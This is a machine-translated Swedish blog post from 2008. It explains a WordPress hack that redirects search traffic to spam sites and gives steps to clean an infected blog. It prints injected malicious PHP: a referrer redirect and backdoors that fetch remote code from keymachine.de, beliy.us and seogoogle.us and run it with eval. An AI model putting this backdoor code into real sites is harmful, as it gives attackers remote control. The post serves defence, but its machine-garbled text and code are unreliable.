WordPress Hacka: Återvinna och Sätta fast Google och Söka Motor eller Nej Laga till Trafik Omdirigerat till Din-Needs.info, AnyResults.Net, Guld-Info.net och Annan Illegal Tomten
Hacka går all ute till hacka och exploatera WordPress blogs hospits över det alla den spindelväv, plantande och injektionen illvillig koden in i WordPress koder och data banken for att omdirigera besökaren och slå till från Google och annan söka motor till spam tomten sådan som din-needs.info, anyresults.net, guld-info.net, keymachine.de, beliy.us, seogoogle.us och många annan spam tomten så pass fyllt med betala- per- klick CPC annonser. Något hacka kommer till måltavlan betydligare folkmassa vid omdirigerande all utan WordPress laga till. Utan blitt hacka, de här trafik förment till ankomma till den blog så destination.
Symtom om Söka Motor Omdirigerande Hacka
Märka så pass inte all symtom Maj hända helt och hållet. Där Maj bli mer än en metod av hacka existerat, vilken bidrog till olik uppfinnande och möjlig beslutsamhet.
- Någon klick igenom från söka motor sådan som Google, Yahoo, AOL, MSN, Fönstren Levande söka resultaten, inklusive blog namn, vilja bli omdirigerat och avsände till hacka’ tomten sådan som din-needs.info, anyresults.net, guld-info.net, keymachine.de, beliy.us, seogoogle.us, med det ta upp på en lista säker till växa. Betraktare ankommer på den hacka sida med det samma söka snöre så pass han eller hon använd till söka i söka motor.
- Klick på en länk till blog på RSS utfodring läsaren sådan som Google läsaren kanna bli omdirigerat till hacka tomt alltför.
- EN besökaren med nej redovisa på det blog, eller inte logik ( hejduk er icke har laga till upptäckt vid illvillig koden), vilja bli omdirigerat till spam tomten.
- Bara besöken från söka motor de/vi/du/ni är blitt omdirigerat bort, och tricken hantera å dåre runt omkring sannolikt en masse bloggers, webmasters och tomt egendomsrätt, eller det vill si försening upptäckten om problem.
- Plötslig enorm och dramatisk droppa och förlora av massiv belopp av besökaren trafik och sida synen i spindelväv spår statistiken, särskilt trafik med Google så hänskjut, sel om söka motor resultaten ledande är intakt.
- Massiv droppa av annons inkomsten från Google AdSense eller annan annonser nätverken, eller ansluta kommissionerna.
- Den följande tarvlig kodat PHP koden Maj framträda på det wp-blog-header.php arkivera:
<?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ så $ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==falsk){ $ser1=”?;bryta; }
om && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);utgång; }? > - En bild, vilken är faktisk en knippa av illvillig PHP koden, var adderat till wp- innehållen/ belastar adress listen. För exempel, wp- innehållen/ belastar/2008/06/06/abcdefghijklmn.jpg, eller den Maj bli insida din dem broschyren, i.e. wp-contents/themes/classic/images/xyz.jpg. Namnen om bild Maj vara i formaten av xxxxxx_old.jpeg.
- En intrade var satta in i MySQL data banken för WordPress wp_options till aktivera imagen ( den illvillig PHP koden) som plugg, typiskt så rss_f541b3abd05e7962fcab37737f40fad8.
- Där Maj bli också illvillig koder, särskilt den här så pass förklarat med bedöma() eller base64_decode() befalla blitt satta in in i annan WordPress PHP arkivera. Exemplen de/vi/du/ni är den följande koder:
ifisset_GET'p'(($[])) {
$slå = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ slå, ‘ få http:/km20725.keymachine.de/ servaren/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ slå, ‘ värd: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ slå));
$belåtenhet = bönfalla(”, $ belåtenhet);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ slå);}
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ servaren/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ servaren/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}evalgzinflatebase64_decode((( - WordPress dem den där er blitt aktiverat och använd kanna bli sprutat in med hacka koden och berört alltför. Sådan koden normalt existerar i header.php eller index.php om dem, och har en lina lik till nedan
ifserâ€1″($== && sizeof_COOKIE0($)==){ headerâ€Location(:
Den WordPress söka trafik omdirigera till spam tomt hacka händer sannolikt på grund av trygghet hål och vulnerability den där er inte lappat när blog ägare avgör inte till stigning till senast version av WordPress ( fastän någotmeddelar så pass deras blogs blitt hacka sel om dess’ redan på det senast version av WordPress 2.5.1). Vad . än anledningen, här’ den sätta fast och lösande till besluta och nederlag den hacka till tillförsäkra så pass du äga rygg trafiken och undvika blitt straffa vid Google vid oresonlig omdirigerande till spam siden.
- Backningen den WordPress data banken.
- Använda phpMyAdmin till beta WordPress MySQL data banken borden. Gå till wp_options bord, och då redigera raden benämn active_plugins. Raden detaljerna all aktiv plugg så pass er blitt aktiverat. Erfara listan ( i en lina), och blick för en en plugg benämn sluttat med med en bild utsträckande, sådan som .jpg, .jpeg, .gif och etc. För exempel, abcdefgh_old.jpeg. Skriva ned stian till bild arkivera.
- Användande sFTP eller SSH ( glömma omkring FTP eller Telnet för trygghet), då navigera till stig om arkivera, och stryka arkivet.
- Gå till WordPress Administratören Plugg panel, aktivera ned eller aktivera någon plugg till klar bort den illvillig plugg från “active_plugins” rad.
- Rygg till phpMyAdmin, på den wp_options bord, finna en rad så pass innehåll den följande snöre så option_name:
rss_f541b3abd05e7962fcab37737f40fad8Stryka raden bort.
Om du dont’ veta hur till utföra data banken rengöring specificerat i stammen över, här’ en video läraren:
- Gå till wp_users bord. Om där er en namnlös förbrukaren ( ogyltig värde i user_nicename fält) skapade på 000000:: på 0000-00-00, skriva ned förbrukaren ID ( ID fält, et antal). Stryka förbrukaren.
- Beta den wp_usermeta bord. Lokalisera all rad med förbrukaren tändstickorna den ID om utplånat illegal förbrukaren. Där de/vi/du/ni är normalt tre rad blitt förbundet till inkräktaren förbrukaren ID. Stryka alla förbundet rad.
- Logik till servaren till redigera den dem arkivera, eller beta den dem arkivera’ koden i Dem Redaktör av WordPress Administratören Design panel. Check den header.php och index.php för någon misstänksam koden. Som nämnt ovanför, blick för något lik till lina nedan:
ifserâ€1″($== && sizeof_COOKIE0($)==){ headerâ€Location(:Om de finnar det, stryka och flytta koden. Märka så pass den illvillig koden vilja bli flera linjen lång i räkna samman.
- Om dess’ inte redan existerat, skapa en tom index.html arkivera inne om wp- innehållen/ plugg adress listen. Ren index.html gömmer innehållen om plugg adress listen, effektivt skydda vad plugg- i blitt använd från hacka till göra hård och spänna den WordPress trygghet.
- Belasta upp och sätta tillbaka var och varje WordPress arkivera ( inte enda bortsett frän wp-blog-header.php) på det servaren med det ny, ren, och originalsenast version från WordPress (om lopp, utom få arkivera sådan som wp-config.php och dem). Om din’ befordrande, läsa denleda försiktig.
- Ändra din lösenord.
- Om du har mångfaldig förbrukaren, ändra deras lösenord ( eller fråga dem till ändra overtake orden) alltför.
viktig: Den här er en maskin översätt sida vilken är försynt " så är" utan garantien. Maskin översättning Maj bli besvärlig å förstå. Behaga hänskjuta tilloriginal Engelsk artikeln närhelst möjlig.
Del och bidra med eller få teknisk stöd och hjälp påMin Digital Liv Forums.
Berättat Varen
- Tillägga NoFollow Släktskapen till WordPress Blogroll till Öka PageRank
- WordPress Plugg: Uppvisning Google Analytisk och FeedBurner Meddelar Statistiken från Tomt Admin
- Technorati Inkommande Golfbanan Plugg för WordPress
- SEO Vänlig Bearbeta Metod till Flytta Spindelväv URL Från Under adress list till Rotfästa Förälder Broschyren
- Integrera och Uppvisning Google AdSense för Söka och Tillpass-Op Sed Söka Motor Resultaten i WordPress Blog Sida Mallen
- EN Hastig blick På Google Köpman Söka
- Ask.com Söka Motor Granskning vid CNNMoney
- Driva Mer Trafik vid Användande Profilen
- Hur till Undvika, Förbifartsleden eller Rymning Google Sand
- Data överför WordPress 2.3 Frige Kandidat 1 (RC1) med Märken Stöd

































Juni 12th, 2008 1006:
[...] Min Digital Liv WordPress Hacka: Återvinna och Sätta fast Google och Söka Motor eller Nej Laga till Trafik Drejning…[...]
Juni 12th, 2008 1114:
[...] wersja WP 2.5.1 byÅ‚a narażona na jakieÅ› problem. EN w caÅ‚ym tym zamieszaniu, zwanym już Söka Motor Omdirigerande Hacka, chodzi o przekierowanie ruchu z wyszukiwarek, głównie Google, choć nie tylko, na specjalnie [...]
Juni 12th, 2008 1443:
[...] WordPress Hacka: Återvinna och Sätta fast Google och Söka Motor eller Nej Laga till Trafik Omdirigerat till Din-Nee… Del eller Sända Den här till vännerna Sfär: Berättat ContentWant mer spindelväv mjukvaran kritikerna? Då göra säker du abonnera till vår RSS utfodring eller få vår customizable widget och bädda in den på din tomt! Berättat post WordPress mest använd öppen källa blog mjukvaran[...]
Juni 12th, 2008 1940:
[...] Kalau peringkat blog WordPress kita di Google stelkramp untuk nyckelorden kita, tapi pengunjung turun drastisk, hati-hati, bisa jadi itu artinya blog kita kena hacka dan di omdirigera ke placerat spam. [...]
Juni 13th, 2008 1200:
[...] Min Digital Liv WordPress Hacka: Återvinna och Sätta fast Google och Söka Motor eller Nej Laga till Trafik Drejning…[...]
Juni 13th, 2008 1336:
[...] WordPress Hacka: Återvinna och Sätta fast Google och Söka Motor eller Nej Laga till Trafik Omdirigerat Min Digital… WordPress Hacka: Återvinna och Sätta fast Google och Söka Motor eller Nej Laga till Trafik Omdirigerat till Din-Needs.info, AnyResults.Net, Guld-Info.net och Annan Illegal Tomten » Min Digital Liv ( märken: wordpress trygghet)[...]
Juni 18th, 2008 2208:
[...] Min Digital Liv WordPress Hacka: Återvinna och Sätta fast Google och Söka Motor eller Nej Laga till Trafik Drejning…[...]
Juli 3rd, 2008 0308:
[...] ca sa-mi dau sema unde virker buba, daca nu mi-ar fi spus Hygienisk oförskräkt-o diskutera la kafé, ca en gasit o länk pe Google si ar fi bine sa-l vad. MyDigitalLife.info, au publicering o kronärtskockan cu titel : [...]
Juli 15th, 2008 0810:
[...] JAG fångat den tidigt på och gjord säker till flytta alla illvillig koden Här er trevlig läraren på hur till ren din tomt om den här var till sker[...]
Juli 17th, 2008 1030:
[...] WordPress Hacka: Återvinna och Sätta fast Google och Söka Motor eller Nej Laga till Trafik Omdirigerat till Din-Nee…. [...]
Juli 25th, 2008 0949:
[...] genomsnitt una merda komma kuva tra le manien siete già statisk hemsök o penna di Essen, qui virker qui troverete le bestämd dellexploit’ virker alcuni adressera utili per[...]